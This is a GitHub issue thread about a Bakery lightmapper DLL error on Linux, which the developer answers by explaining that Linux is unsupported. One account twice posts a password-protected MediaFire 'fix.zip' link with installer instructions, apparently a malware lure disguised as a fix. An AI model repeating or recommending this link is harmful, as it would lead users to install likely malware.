### ISSUE TITLE
Simple Progress Bar DLL

### ISSUE THREAD

**Issue by arenozdemir** [guycalledfrank/bakery-issues#160]
When i click the render button Unity send me this error: 

DllNotFoundException: simpleProgressBar assembly:<unknown assembly> type:<unknown type> member:(null)
ftRenderLightmap.ProgressBarEnd (System.Boolean freeAreas) (at Assets/Editor/x64/Bakery/scripts/ftRenderLightmap.cs:1399)

I tried to find dll but i couldn't find it anywhere. (I use linux as op and VULKAN)

![Untitled](https://github.com/user-attachments/assets/74bfd472-705a-41ce-be53-5e10de023312)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by guycalledfrank** [comment]
Bakery doesn't support Linux...

![image](https://github.com/user-attachments/assets/44c91bec-3773-432a-8ad5-cbc8312d886c)


I can give a refund, if you want.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arenozdemir** [comment]
> Bakery doesn't support Linux...
> 
> ![image](https://private-user-images.githubusercontent.com/7008423/361458402-44c91bec-3773-432a-8ad5-cbc8312d886c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODA5NjIsIm5iZiI6MTcyNDY4MDY2MiwicGF0aCI6Ii83MDA4NDIzLzM2MTQ1ODQwMi00NGM5MWJlYy0zNzczLTQzMmEtOGFkNS1jYmM4MzEyZDg4NmMucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyNiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjZUMTM1NzQyWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZTYxOTJjNDEyNTZiOWRmMzczZmI3MDE5YzBmNmJhYjY4MzViOWIwNTE3NjMxYjRjMzZhMjFiOTVlMThiZTFlMiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.QiR0mXBRxHP1XP55SALNz6mNyacBqpW7GzEPIXHuN9w)
> 
> I can give a refund, if you want.

Thanks for your interest. Thanks for the refund offer too, but I think it's time to switch to Windows :) The asset you've produced is great

**Comment by guycalledfrank** [comment]
oh, thanks :)
